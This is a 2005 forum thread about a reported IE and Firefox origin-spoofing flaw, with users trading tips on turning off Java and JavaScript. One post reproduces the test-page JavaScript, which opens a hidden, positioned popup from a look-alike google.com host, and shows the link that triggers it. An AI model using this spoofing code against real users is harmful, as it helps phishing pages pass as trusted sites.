IE, Firefox Spoofable, Again

Yahoo News ^ | 21 June 2005 | Unknown

[ShadowAce]

[martin_fierro]

D'oh.

[USF]

read later...

[flashbunny]

tagging

[N3WBI3]

Here is the bit of JavaScript that they are using to do this

<script language="JavaScript" type="text/javascript">
var o_height = 768;
var o_width = 1024;

if ( screen.width > 100 )
{
o_width = screen.width;
}

if ( screen.height > 100 )
{
o_height = screen.height;
}

function run()
{
if ( window.opera )
{

window.open('http://www.google.com.secunia.com/tests/origin_spoof.php', '_blank', 'height=1,width=1,left=3000,top=3000,resizable=no,scrollbars=no');
}
else
{
window.open('http://www.google.com.secunia.com/tests/origin_spoof.php', '_blank', 'height=1,width=1,resizable=no,scrollbars=no,left=' + ((o_width / 2) - 50) + ',top=' + ((o_height / 2) - 150) ); }
window.focus();
}
</script>

[N3WBI3]

And of course here is how you would call that function

(a href="http://www.google.com/" onclick="run();")

[Zuben Elgenubi]

How do we turn off Java in Firefox? Anyone know?

[Blood of Tyrants]

Well crap!

[atomic_dog]

Here's how you stop it for Firefox.
Firefox NoScript Extension.

[ShadowAce]

Go to Options --> Web Features --> Enable Java and click off the check box

[Blood of Tyrants]

Click Tools, then Options, then Web Features and deselect it.

[Zuben Elgenubi]

Thanks.

Deselect JavaSript also?

[Blood of Tyrants]

Too many bad reviews.

[Zuben Elgenubi]

Thanks

[Blood of Tyrants]

Actually I think that JavaScript is the one you are supposed to deselect.

[Zuben Elgenubi]

Got it, thanks. My bad.

[B Knotts]

Doesn't seem to work in Konqueror 3.4.0.

[kevkrom]

Typical shoddy tech reporting... they say it's a Java problem, and then talk about a JavaScript exploit. JavaScript is to Java as Velveeta is to Cheddar.

[ShadowAce]

That's kewl. I may have to start using that. :)